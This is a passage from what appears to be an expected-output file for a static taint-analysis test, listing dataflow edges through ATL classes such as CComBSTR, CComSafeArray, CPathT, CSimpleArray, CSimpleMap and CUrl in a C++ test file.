atl.cpp:489:10:489:11 | b4 | | -| atl.cpp:487:14:487:15 | call to CComBSTR | atl.cpp:492:19:492:20 | b4 | | -| atl.cpp:487:14:487:15 | call to CComBSTR | atl.cpp:514:3:514:3 | b4 | | -| atl.cpp:488:5:488:6 | ref arg b4 | atl.cpp:489:10:489:11 | b4 | | -| atl.cpp:488:5:488:6 | ref arg b4 | atl.cpp:492:19:492:20 | b4 | | -| atl.cpp:488:5:488:6 | ref arg b4 | atl.cpp:514:3:514:3 | b4 | | -| atl.cpp:489:10:489:11 | b4 [post update] | atl.cpp:492:19:492:20 | b4 | | -| atl.cpp:489:10:489:11 | b4 [post update] | atl.cpp:514:3:514:3 | b4 | | -| atl.cpp:489:13:489:17 | ref arg m_str | atl.cpp:492:22:492:26 | m_str | | -| atl.cpp:491:14:491:15 | call to CComBSTR | atl.cpp:492:5:492:6 | b5 | | -| atl.cpp:491:14:491:15 | call to CComBSTR | atl.cpp:493:10:493:11 | b5 | | -| atl.cpp:491:14:491:15 | call to CComBSTR | atl.cpp:514:3:514:3 | b5 | | -| atl.cpp:492:5:492:6 | ref arg b5 | atl.cpp:493:10:493:11 | b5 | | -| atl.cpp:492:5:492:6 | ref arg b5 | atl.cpp:514:3:514:3 | b5 | | -| atl.cpp:492:19:492:20 | b4 [post update] | atl.cpp:514:3:514:3 | b4 | | -| atl.cpp:493:10:493:11 | b5 [post update] | atl.cpp:514:3:514:3 | b5 | | -| atl.cpp:495:14:495:15 | call to CComBSTR | atl.cpp:496:5:496:6 | b6 | | -| atl.cpp:495:14:495:15 | call to CComBSTR | atl.cpp:497:10:497:11 | b6 | | -| atl.cpp:495:14:495:15 | call to CComBSTR | atl.cpp:514:3:514:3 | b6 | | -| atl.cpp:496:5:496:6 | ref arg b6 | atl.cpp:497:10:497:11 | b6 | | -| atl.cpp:496:5:496:6 | ref arg b6 | atl.cpp:514:3:514:3 | b6 | | -| atl.cpp:497:10:497:11 | b6 [post update] | atl.cpp:514:3:514:3 | b6 | | -| atl.cpp:499:14:499:15 | call to CComBSTR | atl.cpp:500:5:500:6 | b7 | | -| atl.cpp:499:14:499:15 | call to CComBSTR | atl.cpp:501:10:501:11 | b7 | | -| atl.cpp:499:14:499:15 | call to CComBSTR | atl.cpp:504:19:504:20 | b7 | | -| atl.cpp:499:14:499:15 | call to CComBSTR | atl.cpp:514:3:514:3 | b7 | | -| atl.cpp:500:5:500:6 | ref arg b7 | atl.cpp:501:10:501:11 | b7 | | -| atl.cpp:500:5:500:6 | ref arg b7 | atl.cpp:504:19:504:20 | b7 | | -| atl.cpp:500:5:500:6 | ref arg b7 | atl.cpp:514:3:514:3 | b7 | | -| atl.cpp:501:10:501:11 | b7 [post update] | atl.cpp:504:19:504:20 | b7 | | -| atl.cpp:501:10:501:11 | b7 [post update] | atl.cpp:514:3:514:3 | b7 | | -| atl.cpp:501:13:501:17 | ref arg m_str | atl.cpp:504:22:504:26 | m_str | | -| atl.cpp:503:14:503:15 | call to CComBSTR | atl.cpp:504:5:504:6 | b8 | | -| atl.cpp:503:14:503:15 | call to CComBSTR | atl.cpp:505:10:505:11 | b8 | | -| atl.cpp:503:14:503:15 | call to CComBSTR | atl.cpp:514:3:514:3 | b8 | | -| atl.cpp:504:5:504:6 | ref arg b8 | atl.cpp:505:10:505:11 | b8 | | -| atl.cpp:504:5:504:6 | ref arg b8 | atl.cpp:514:3:514:3 | b8 | | -| atl.cpp:504:19:504:20 | b7 [post update] | atl.cpp:514:3:514:3 | b7 | | -| atl.cpp:505:10:505:11 | b8 [post update] | atl.cpp:514:3:514:3 | b8 | | -| atl.cpp:507:14:507:15 | call to CComBSTR | atl.cpp:509:5:509:6 | b9 | | -| atl.cpp:507:14:507:15 | call to CComBSTR | atl.cpp:510:5:510:6 | b9 | | -| atl.cpp:507:14:507:15 | call to CComBSTR | atl.cpp:513:10:513:11 | b9 | | -| atl.cpp:507:14:507:15 | call to CComBSTR | atl.cpp:514:3:514:3 | b9 | | -| atl.cpp:508:17:508:20 | safe | atl.cpp:510:21:510:24 | safe | | -| atl.cpp:508:17:508:20 | safe | atl.cpp:511:10:511:13 | safe | | -| atl.cpp:509:5:509:6 | ref arg b9 | atl.cpp:510:5:510:6 | b9 | | -| atl.cpp:509:5:509:6 | ref arg b9 | atl.cpp:513:10:513:11 | b9 | | -| atl.cpp:509:5:509:6 | ref arg b9 | atl.cpp:514:3:514:3 | b9 | | -| atl.cpp:510:5:510:6 | ref arg b9 | atl.cpp:513:10:513:11 | b9 | | -| atl.cpp:510:5:510:6 | ref arg b9 | atl.cpp:514:3:514:3 | b9 | | -| atl.cpp:510:20:510:24 | ref arg & ... | atl.cpp:510:21:510:24 | safe [inner post update] | | -| atl.cpp:510:20:510:24 | ref arg & ... | atl.cpp:511:10:511:13 | safe | | -| atl.cpp:510:21:510:24 | safe | atl.cpp:510:20:510:24 | & ... | | -| atl.cpp:513:10:513:11 | ref arg b9 | atl.cpp:514:3:514:3 | b9 | | -| atl.cpp:516:16:516:39 | call to indirect_source | atl.cpp:518:16:518:16 | w | | -| atl.cpp:516:16:516:39 | call to indirect_source | atl.cpp:522:15:522:15 | w | | -| atl.cpp:516:16:516:39 | call to indirect_source | atl.cpp:526:20:526:20 | w | | -| atl.cpp:518:16:518:16 | ref arg w | atl.cpp:522:15:522:15 | w | | -| atl.cpp:518:16:518:16 | ref arg w | atl.cpp:526:20:526:20 | w | | -| atl.cpp:518:16:518:16 | w | atl.cpp:518:16:518:17 | call to CComBSTR | TAINT | -| atl.cpp:518:16:518:17 | call to CComBSTR | atl.cpp:519:10:519:10 | b | | -| atl.cpp:518:16:518:17 | call to CComBSTR | atl.cpp:524:3:524:3 | b | | -| atl.cpp:519:10:519:10 | b [post update] | atl.cpp:524:3:524:3 | b | | -| atl.cpp:521:14:521:15 | call to CComBSTR | atl.cpp:522:5:522:6 | b2 | | -| atl.cpp:521:14:521:15 | call to CComBSTR | atl.cpp:523:10:523:11 | b2 | | -| atl.cpp:521:14:521:15 | call to CComBSTR | atl.cpp:524:3:524:3 | b2 | | -| atl.cpp:522:5:522:6 | ref arg b2 | atl.cpp:523:10:523:11 | b2 | | -| atl.cpp:522:5:522:6 | ref arg b2 | atl.cpp:524:3:524:3 | b2 | | -| atl.cpp:522:15:522:15 | ref arg w | atl.cpp:526:20:526:20 | w | | -| atl.cpp:523:10:523:11 | b2 [post update] | atl.cpp:524:3:524:3 | b2 | | -| atl.cpp:526:16:526:21 | call to CComBSTR | atl.cpp:527:10:527:10 | b | | -| atl.cpp:526:16:526:21 | call to CComBSTR | atl.cpp:528:3:528:3 | b | | -| atl.cpp:527:10:527:10 | b [post update] | atl.cpp:528:3:528:3 | b | | -| atl.cpp:573:22:573:33 | call to getSafeArray | atl.cpp:574:8:574:11 | safe | | -| atl.cpp:573:22:573:33 | call to getSafeArray | atl.cpp:576:24:576:27 | safe | | -| atl.cpp:573:22:573:33 | call to getSafeArray | atl.cpp:587:11:587:14 | safe | | -| atl.cpp:574:8:574:11 | safe [post update] | atl.cpp:576:24:576:27 | safe | | -| atl.cpp:574:8:574:11 | safe [post update] | atl.cpp:587:11:587:14 | safe | | -| atl.cpp:576:24:576:27 | safe | atl.cpp:576:24:576:28 | call to CComSafeArray | TAINT | -| atl.cpp:576:24:576:28 | call to CComSafeArray | atl.cpp:577:8:577:8 | c | | -| atl.cpp:576:24:576:28 | call to CComSafeArray | atl.cpp:578:8:578:8 | c | | -| atl.cpp:576:24:576:28 | call to CComSafeArray | atl.cpp:579:8:579:8 | c | | -| atl.cpp:576:24:576:28 | call to CComSafeArray | atl.cpp:580:8:580:8 | c | | -| atl.cpp:576:24:576:28 | call to CComSafeArray | atl.cpp:581:3:581:3 | c | | -| atl.cpp:577:8:577:8 | ref arg c | atl.cpp:578:8:578:8 | c | | -| atl.cpp:577:8:577:8 | ref arg c | atl.cpp:579:8:579:8 | c | | -| atl.cpp:577:8:577:8 | ref arg c | atl.cpp:580:8:580:8 | c | | -| atl.cpp:577:8:577:8 | ref arg c | atl.cpp:581:3:581:3 | c | | -| atl.cpp:578:8:578:8 | ref arg c | atl.cpp:579:8:579:8 | c | | -| atl.cpp:578:8:578:8 | ref arg c | atl.cpp:580:8:580:8 | c | | -| atl.cpp:578:8:578:8 | ref arg c | atl.cpp:581:3:581:3 | c | | -| atl.cpp:579:8:579:8 | ref arg c | atl.cpp:580:8:580:8 | c | | -| atl.cpp:579:8:579:8 | ref arg c | atl.cpp:581:3:581:3 | c | | -| atl.cpp:580:8:580:8 | c [post update] | atl.cpp:581:3:581:3 | c | | -| atl.cpp:583:24:583:24 | call to CComSafeArray | atl.cpp:584:10:584:10 | c | | -| atl.cpp:583:24:583:24 | call to CComSafeArray | atl.cpp:585:10:585:10 | c | | -| atl.cpp:583:24:583:24 | call to CComSafeArray | atl.cpp:586:10:586:10 | c | | -| atl.cpp:583:24:583:24 | call to CComSafeArray | atl.cpp:587:5:587:5 | c | | -| atl.cpp:583:24:583:24 | call to CComSafeArray | atl.cpp:588:10:588:10 | c | | -| atl.cpp:583:24:583:24 | call to CComSafeArray | atl.cpp:589:10:589:10 | c | | -| atl.cpp:583:24:583:24 | call to CComSafeArray | atl.cpp:590:10:590:10 | c | | -| atl.cpp:583:24:583:24 | call to CComSafeArray | atl.cpp:591:35:591:35 | c | | -| atl.cpp:583:24:583:24 | call to CComSafeArray | atl.cpp:592:3:592:3 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:585:10:585:10 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:586:10:586:10 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:587:5:587:5 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:589:10:589:10 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:590:10:590:10 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:591:35:591:35 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:592:3:592:3 | c | | -| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:586:10:586:10 | c | | -| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:587:5:587:5 | c | | -| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:589:10:589:10 | c | | -| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:590:10:590:10 | c | | -| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:591:35:591:35 | c | | -| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:592:3:592:3 | c | | -| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:587:5:587:5 | c | | -| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:589:10:589:10 | c | | -| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:590:10:590:10 | c | | -| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:591:35:591:35 | c | | -| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:592:3:592:3 | c | | -| atl.cpp:587:5:587:5 | ref arg c | atl.cpp:588:10:588:10 | c | | -| atl.cpp:587:5:587:5 | ref arg c | atl.cpp:589:10:589:10 | c | | -| atl.cpp:587:5:587:5 | ref arg c | atl.cpp:590:10:590:10 | c | | -| atl.cpp:587:5:587:5 | ref arg c | atl.cpp:591:35:591:35 | c | | -| atl.cpp:587:5:587:5 | ref arg c | atl.cpp:592:3:592:3 | c | | -| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:589:10:589:10 | c | | -| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:590:10:590:10 | c | | -| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:591:35:591:35 | c | | -| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:592:3:592:3 | c | | -| atl.cpp:589:10:589:10 | ref arg c | atl.cpp:590:10:590:10 | c | | -| atl.cpp:589:10:589:10 | ref arg c | atl.cpp:591:35:591:35 | c | | -| atl.cpp:589:10:589:10 | ref arg c | atl.cpp:592:3:592:3 | c | | -| atl.cpp:590:10:590:10 | ref arg c | atl.cpp:591:35:591:35 | c | | -| atl.cpp:590:10:590:10 | ref arg c | atl.cpp:592:3:592:3 | c | | -| atl.cpp:591:35:591:35 | ref arg c | atl.cpp:592:3:592:3 | c | | -| atl.cpp:594:24:594:24 | call to CComSafeArray | atl.cpp:595:5:595:5 | c | | -| atl.cpp:594:24:594:24 | call to CComSafeArray | atl.cpp:596:10:596:10 | c | | -| atl.cpp:594:24:594:24 | call to CComSafeArray | atl.cpp:597:10:597:10 | c | | -| atl.cpp:594:24:594:24 | call to CComSafeArray | atl.cpp:598:10:598:10 | c | | -| atl.cpp:594:24:594:24 | call to CComSafeArray | atl.cpp:599:3:599:3 | c | | -| atl.cpp:595:5:595:5 | ref arg c | atl.cpp:596:10:596:10 | c | | -| atl.cpp:595:5:595:5 | ref arg c | atl.cpp:597:10:597:10 | c | | -| atl.cpp:595:5:595:5 | ref arg c | atl.cpp:598:10:598:10 | c | | -| atl.cpp:595:5:595:5 | ref arg c | atl.cpp:599:3:599:3 | c | | -| atl.cpp:596:10:596:10 | ref arg c | atl.cpp:597:10:597:10 | c | | -| atl.cpp:596:10:596:10 | ref arg c | atl.cpp:598:10:598:10 | c | | -| atl.cpp:596:10:596:10 | ref arg c | atl.cpp:599:3:599:3 | c | | -| atl.cpp:597:10:597:10 | ref arg c | atl.cpp:598:10:598:10 | c | | -| atl.cpp:597:10:597:10 | ref arg c | atl.cpp:599:3:599:3 | c | | -| atl.cpp:598:10:598:10 | ref arg c | atl.cpp:599:3:599:3 | c | | -| atl.cpp:601:24:601:24 | call to CComSafeArray | atl.cpp:602:5:602:5 | c | | -| atl.cpp:601:24:601:24 | call to CComSafeArray | atl.cpp:603:10:603:10 | c | | -| atl.cpp:601:24:601:24 | call to CComSafeArray | atl.cpp:604:10:604:10 | c | | -| atl.cpp:601:24:601:24 | call to CComSafeArray | atl.cpp:605:3:605:3 | c | | -| atl.cpp:602:5:602:5 | ref arg c | atl.cpp:603:10:603:10 | c | | -| atl.cpp:602:5:602:5 | ref arg c | atl.cpp:604:10:604:10 | c | | -| atl.cpp:602:5:602:5 | ref arg c | atl.cpp:605:3:605:3 | c | | -| atl.cpp:603:10:603:10 | ref arg c | atl.cpp:604:10:604:10 | c | | -| atl.cpp:603:10:603:10 | ref arg c | atl.cpp:605:3:605:3 | c | | -| atl.cpp:604:10:604:10 | ref arg c | atl.cpp:605:3:605:3 | c | | -| atl.cpp:666:13:666:33 | call to indirect_source | atl.cpp:667:11:667:11 | x | | -| atl.cpp:666:13:666:33 | call to indirect_source | atl.cpp:676:20:676:20 | x | | -| atl.cpp:666:13:666:33 | call to indirect_source | atl.cpp:681:14:681:14 | x | | -| atl.cpp:666:13:666:33 | call to indirect_source | atl.cpp:689:11:689:11 | x | | -| atl.cpp:666:13:666:33 | call to indirect_source | atl.cpp:695:15:695:15 | x | | -| atl.cpp:666:13:666:33 | call to indirect_source | atl.cpp:700:24:700:24 | x | | -| atl.cpp:666:13:666:33 | call to indirect_source | atl.cpp:706:30:706:30 | x | | -| atl.cpp:667:11:667:11 | ref arg x | atl.cpp:676:20:676:20 | x | | -| atl.cpp:667:11:667:11 | ref arg x | atl.cpp:681:14:681:14 | x | | -| atl.cpp:667:11:667:11 | ref arg x | atl.cpp:689:11:689:11 | x | | -| atl.cpp:667:11:667:11 | ref arg x | atl.cpp:695:15:695:15 | x | | -| atl.cpp:667:11:667:11 | ref arg x | atl.cpp:700:24:700:24 | x | | -| atl.cpp:667:11:667:11 | ref arg x | atl.cpp:706:30:706:30 | x | | -| atl.cpp:667:11:667:11 | x | atl.cpp:667:11:667:12 | call to CPathT | TAINT | -| atl.cpp:667:11:667:12 | call to CPathT | atl.cpp:668:27:668:27 | p | | -| atl.cpp:667:11:667:12 | call to CPathT | atl.cpp:669:8:669:8 | p | | -| atl.cpp:667:11:667:12 | call to CPathT | atl.cpp:671:12:671:12 | p | | -| atl.cpp:668:27:668:27 | ref arg p | atl.cpp:669:8:669:8 | p | | -| atl.cpp:668:27:668:27 | ref arg p | atl.cpp:671:12:671:12 | p | | -| atl.cpp:669:8:669:8 | p [post update] | atl.cpp:671:12:671:12 | p | | -| atl.cpp:669:10:669:18 | ref arg m_strPath | atl.cpp:672:11:672:19 | m_strPath | | -| atl.cpp:671:12:671:12 | p | atl.cpp:671:12:671:13 | call to CPathT | | -| atl.cpp:671:12:671:13 | call to CPathT | atl.cpp:672:8:672:9 | p2 | | -| atl.cpp:675:11:675:11 | call to CPathT | atl.cpp:676:5:676:5 | p | | -| atl.cpp:675:11:675:11 | call to CPathT | atl.cpp:677:10:677:10 | p | | -| atl.cpp:676:5:676:5 | ref arg p | atl.cpp:677:10:677:10 | p | | -| atl.cpp:676:20:676:20 | ref arg x | atl.cpp:681:14:681:14 | x | | -| atl.cpp:676:20:676:20 | ref arg x | atl.cpp:689:11:689:11 | x | | -| atl.cpp:676:20:676:20 | ref arg x | atl.cpp:695:15:695:15 | x | | -| atl.cpp:676:20:676:20 | ref arg x | atl.cpp:700:24:700:24 | x | | -| atl.cpp:676:20:676:20 | ref arg x | atl.cpp:706:30:706:30 | x | | -| atl.cpp:680:11:680:11 | call to CPathT | atl.cpp:681:5:681:5 | p | | -| atl.cpp:680:11:680:11 | call to CPathT | atl.cpp:682:10:682:10 | p | | -| atl.cpp:680:11:680:11 | call to CPathT | atl.cpp:685:11:685:11 | p | | -| atl.cpp:681:5:681:5 | ref arg p | atl.cpp:682:10:682:10 | p | | -| atl.cpp:681:5:681:5 | ref arg p | atl.cpp:685:11:685:11 | p | | -| atl.cpp:681:14:681:14 | ref arg x | atl.cpp:689:11:689:11 | x | | -| atl.cpp:681:14:681:14 | ref arg x | atl.cpp:695:15:695:15 | x | | -| atl.cpp:681:14:681:14 | ref arg x | atl.cpp:700:24:700:24 | x | | -| atl.cpp:681:14:681:14 | ref arg x | atl.cpp:706:30:706:30 | x | | -| atl.cpp:682:10:682:10 | p [post update] | atl.cpp:685:11:685:11 | p | | -| atl.cpp:684:11:684:12 | call to CPathT | atl.cpp:685:5:685:6 | p2 | | -| atl.cpp:684:11:684:12 | call to CPathT | atl.cpp:686:10:686:11 | p2 | | -| atl.cpp:685:5:685:6 | ref arg p2 | atl.cpp:686:10:686:11 | p2 | | -| atl.cpp:685:11:685:11 | call to operator char *& | atl.cpp:685:8:685:8 | call to operator+= | TAINT | -| atl.cpp:688:11:688:12 | call to CPathT | atl.cpp:689:5:689:6 | p3 | | -| atl.cpp:688:11:688:12 | call to CPathT | atl.cpp:690:10:690:11 | p3 | | -| atl.cpp:689:5:689:6 | ref arg p3 | atl.cpp:690:10:690:11 | p3 | | -| atl.cpp:689:11:689:11 | ref arg x | atl.cpp:695:15:695:15 | x | | -| atl.cpp:689:11:689:11 | ref arg x | atl.cpp:700:24:700:24 | x | | -| atl.cpp:689:11:689:11 | ref arg x | atl.cpp:706:30:706:30 | x | | -| atl.cpp:689:11:689:11 | x | atl.cpp:689:8:689:8 | call to operator+= | TAINT | -| atl.cpp:694:11:694:11 | call to CPathT | atl.cpp:695:5:695:5 | p | | -| atl.cpp:694:11:694:11 | call to CPathT | atl.cpp:696:10:696:10 | p | | -| atl.cpp:695:5:695:5 | ref arg p | atl.cpp:696:10:696:10 | p | | -| atl.cpp:695:15:695:15 | ref arg x | atl.cpp:700:24:700:24 | x | | -| atl.cpp:695:15:695:15 | ref arg x | atl.cpp:706:30:706:30 | x | | -| atl.cpp:699:11:699:11 | call to CPathT | atl.cpp:700:5:700:5 | p | | -| atl.cpp:699:11:699:11 | call to CPathT | atl.cpp:701:10:701:10 | p | | -| atl.cpp:700:5:700:5 | ref arg p | atl.cpp:701:10:701:10 | p | | -| atl.cpp:700:24:700:24 | ref arg x | atl.cpp:706:30:706:30 | x | | -| atl.cpp:705:11:705:11 | call to CPathT | atl.cpp:706:15:706:15 | p | | -| atl.cpp:706:17:706:28 | call to CommonPrefix | atl.cpp:707:10:707:11 | p2 | | -| atl.cpp:706:17:706:28 | call to CommonPrefix | atl.cpp:708:10:708:11 | p2 | | -| atl.cpp:707:10:707:11 | p2 [post update] | atl.cpp:708:10:708:11 | p2 | | -| atl.cpp:735:11:735:21 | call to source | atl.cpp:738:11:738:11 | x | | -| atl.cpp:735:11:735:21 | call to source | atl.cpp:750:11:750:11 | x | | -| atl.cpp:735:11:735:21 | call to source | atl.cpp:754:23:754:23 | x | | -| atl.cpp:737:23:737:23 | call to CSimpleArray | atl.cpp:738:5:738:5 | a | | -| atl.cpp:737:23:737:23 | call to CSimpleArray | atl.cpp:739:10:739:10 | a | | -| atl.cpp:737:23:737:23 | call to CSimpleArray | atl.cpp:740:5:740:5 | a | | -| atl.cpp:737:23:737:23 | call to CSimpleArray | atl.cpp:741:10:741:10 | a | | -| atl.cpp:737:23:737:23 | call to CSimpleArray | atl.cpp:745:10:745:10 | a | | -| atl.cpp:737:23:737:23 | call to CSimpleArray | atl.cpp:747:3:747:3 | a | | -| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:739:10:739:10 | a | | -| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:740:5:740:5 | a | | -| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:741:10:741:10 | a | | -| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:745:10:745:10 | a | | -| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:747:3:747:3 | a | | -| atl.cpp:739:10:739:10 | ref arg a | atl.cpp:740:5:740:5 | a | | -| atl.cpp:739:10:739:10 | ref arg a | atl.cpp:741:10:741:10 | a | | -| atl.cpp:739:10:739:10 | ref arg a | atl.cpp:745:10:745:10 | a | | -| atl.cpp:739:10:739:10 | ref arg a | atl.cpp:747:3:747:3 | a | | -| atl.cpp:740:5:740:5 | ref arg a | atl.cpp:741:10:741:10 | a | | -| atl.cpp:740:5:740:5 | ref arg a | atl.cpp:745:10:745:10 | a | | -| atl.cpp:740:5:740:5 | ref arg a | atl.cpp:747:3:747:3 | a | | -| atl.cpp:741:10:741:10 | ref arg a | atl.cpp:745:10:745:10 | a | | -| atl.cpp:741:10:741:10 | ref arg a | atl.cpp:747:3:747:3 | a | | -| atl.cpp:743:23:743:24 | call to CSimpleArray | atl.cpp:744:10:744:11 | a2 | | -| atl.cpp:743:23:743:24 | call to CSimpleArray | atl.cpp:745:5:745:6 | a2 | | -| atl.cpp:743:23:743:24 | call to CSimpleArray | atl.cpp:746:10:746:11 | a2 | | -| atl.cpp:743:23:743:24 | call to CSimpleArray | atl.cpp:747:3:747:3 | a2 | | -| atl.cpp:744:10:744:11 | ref arg a2 | atl.cpp:745:5:745:6 | a2 | | -| atl.cpp:744:10:744:11 | ref arg a2 | atl.cpp:746:10:746:11 | a2 | | -| atl.cpp:744:10:744:11 | ref arg a2 | atl.cpp:747:3:747:3 | a2 | | -| atl.cpp:745:5:745:6 | ref arg a2 | atl.cpp:746:10:746:11 | a2 | | -| atl.cpp:745:5:745:6 | ref arg a2 | atl.cpp:747:3:747:3 | a2 | | -| atl.cpp:745:10:745:10 | a | atl.cpp:745:5:745:6 | ref arg a2 | TAINT | -| atl.cpp:745:10:745:10 | a | atl.cpp:745:8:745:8 | call to operator= | TAINT | -| atl.cpp:746:10:746:11 | ref arg a2 | atl.cpp:747:3:747:3 | a2 | | -| atl.cpp:749:23:749:23 | call to CSimpleArray | atl.cpp:750:5:750:5 | a | | -| atl.cpp:749:23:749:23 | call to CSimpleArray | atl.cpp:751:10:751:10 | a | | -| atl.cpp:749:23:749:23 | call to CSimpleArray | atl.cpp:756:3:756:3 | a | | -| atl.cpp:750:5:750:5 | ref arg a | atl.cpp:751:10:751:10 | a | | -| atl.cpp:750:5:750:5 | ref arg a | atl.cpp:756:3:756:3 | a | | -| atl.cpp:751:10:751:10 | ref arg a | atl.cpp:756:3:756:3 | a | | -| atl.cpp:753:23:753:24 | call to CSimpleArray | atl.cpp:754:15:754:16 | a2 | | -| atl.cpp:753:23:753:24 | call to CSimpleArray | atl.cpp:755:10:755:11 | a2 | | -| atl.cpp:753:23:753:24 | call to CSimpleArray | atl.cpp:756:3:756:3 | a2 | | -| atl.cpp:754:18:754:21 | call to Find | atl.cpp:755:13:755:15 | pos | | -| atl.cpp:755:10:755:11 | ref arg a2 | atl.cpp:756:3:756:3 | a2 | | -| atl.cpp:780:16:780:31 | call to source | atl.cpp:783:20:783:20 | x | | -| atl.cpp:780:16:780:31 | call to source | atl.cpp:793:26:793:26 | x | | -| atl.cpp:780:16:780:31 | call to source | atl.cpp:798:32:798:32 | x | | -| atl.cpp:780:16:780:31 | call to source | atl.cpp:804:22:804:22 | x | | -| atl.cpp:780:16:780:31 | call to source | atl.cpp:809:30:809:30 | x | | -| atl.cpp:782:33:782:33 | call to CSimpleMap | atl.cpp:783:5:783:5 | a | | -| atl.cpp:782:33:782:33 | call to CSimpleMap | atl.cpp:784:10:784:10 | a | | -| atl.cpp:782:33:782:33 | call to CSimpleMap | atl.cpp:785:3:785:3 | a | | -| atl.cpp:783:5:783:5 | ref arg a | atl.cpp:784:10:784:10 | a | | -| atl.cpp:783:5:783:5 | ref arg a | atl.cpp:785:3:785:3 | a | | -| atl.cpp:784:10:784:10 | ref arg a | atl.cpp:785:3:785:3 | a | | -| atl.cpp:787:33:787:33 | call to CSimpleMap | atl.cpp:788:16:788:16 | a | | -| atl.cpp:787:33:787:33 | call to CSimpleMap | atl.cpp:789:10:789:10 | a | | -| atl.cpp:787:33:787:33 | call to CSimpleMap | atl.cpp:790:3:790:3 | a | | -| atl.cpp:788:18:788:24 | call to FindKey | atl.cpp:789:23:789:25 | pos | | -| atl.cpp:789:10:789:10 | ref arg a | atl.cpp:790:3:790:3 | a | | -| atl.cpp:792:33:792:33 | call to CSimpleMap | atl.cpp:793:16:793:16 | a | | -| atl.cpp:792:33:792:33 | call to CSimpleMap | atl.cpp:794:10:794:10 | a | | -| atl.cpp:792:33:792:33 | call to CSimpleMap | atl.cpp:795:3:795:3 | a | | -| atl.cpp:793:18:793:24 | call to FindVal | atl.cpp:794:23:794:25 | pos | | -| atl.cpp:794:10:794:10 | ref arg a | atl.cpp:795:3:795:3 | a | | -| atl.cpp:797:33:797:33 | call to CSimpleMap | atl.cpp:798:16:798:16 | a | | -| atl.cpp:797:33:797:33 | call to CSimpleMap | atl.cpp:800:10:800:10 | a | | -| atl.cpp:797:33:797:33 | call to CSimpleMap | atl.cpp:801:3:801:3 | a | | -| atl.cpp:798:16:798:16 | ref arg a | atl.cpp:800:10:800:10 | a | | -| atl.cpp:798:16:798:16 | ref arg a | atl.cpp:801:3:801:3 | a | | -| atl.cpp:798:18:798:30 | call to ReverseLookup | atl.cpp:799:10:799:12 | key | | -| atl.cpp:798:18:798:30 | call to ReverseLookup | atl.cpp:800:19:800:21 | key | | -| atl.cpp:799:10:799:12 | ref arg key | atl.cpp:800:19:800:21 | key | | -| atl.cpp:800:10:800:10 | ref arg a | atl.cpp:801:3:801:3 | a | | -| atl.cpp:803:33:803:33 | call to CSimpleMap | atl.cpp:804:5:804:5 | a | | -| atl.cpp:803:33:803:33 | call to CSimpleMap | atl.cpp:805:10:805:10 | a | | -| atl.cpp:803:33:803:33 | call to CSimpleMap | atl.cpp:806:3:806:3 | a | | -| atl.cpp:804:5:804:5 | ref arg a | atl.cpp:805:10:805:10 | a | | -| atl.cpp:804:5:804:5 | ref arg a | atl.cpp:806:3:806:3 | a | | -| atl.cpp:805:10:805:10 | ref arg a | atl.cpp:806:3:806:3 | a | | -| atl.cpp:808:33:808:33 | call to CSimpleMap | atl.cpp:809:5:809:5 | a | | -| atl.cpp:808:33:808:33 | call to CSimpleMap | atl.cpp:810:10:810:10 | a | | -| atl.cpp:808:33:808:33 | call to CSimpleMap | atl.cpp:811:3:811:3 | a | | -| atl.cpp:809:5:809:5 | ref arg a | atl.cpp:810:10:810:10 | a | | -| atl.cpp:809:5:809:5 | ref arg a | atl.cpp:811:3:811:3 | a | | -| atl.cpp:810:10:810:10 | ref arg a | atl.cpp:811:3:811:3 | a | | -| atl.cpp:852:13:852:33 | call to indirect_source | atl.cpp:854:16:854:16 | x | | -| atl.cpp:852:13:852:33 | call to indirect_source | atl.cpp:867:19:867:19 | x | | -| atl.cpp:852:13:852:33 | call to indirect_source | atl.cpp:873:23:873:23 | x | | -| atl.cpp:852:13:852:33 | call to indirect_source | atl.cpp:878:22:878:22 | x | | -| atl.cpp:852:13:852:33 | call to indirect_source | atl.cpp:883:22:883:22 | x | | -| atl.cpp:852:13:852:33 | call to indirect_source | atl.cpp:888:24:888:24 | x | | -| atl.cpp:852:13:852:33 | call to indirect_source | atl.cpp:893:21:893:21 | x | | -| atl.cpp:852:13:852:33 | call to indirect_source | atl.cpp:898:22:898:22 | x | | -| atl.cpp:853:8:853:10 | call to CUrl | atl.cpp:854:3:854:5 | url | | -| atl.cpp:853:8:853:10 | call to CUrl | atl.cpp:855:8:855:10 | url | | -| atl.cpp:853:8:853:10 | call to CUrl | atl.cpp:856:8:856:10 | url | | -| atl.cpp:853:8:853:10 | call to CUrl | atl.cpp:857:8:857:10 | url | | -| atl.cpp:853:8:853:10 | call to CUrl | atl.cpp:858:8:858:10 | url | | -| atl.cpp:853:8:853:10 | call to CUrl | atl.cpp:859:8:859:10 | url | | -| atl.cpp:853:8:853:10 | call to CUrl | atl.cpp:860:8:860:10 | url | | -| atl.cpp:853:8:853:10 | call to CUrl | atl.cpp:861:8:861:10 | url | | -| 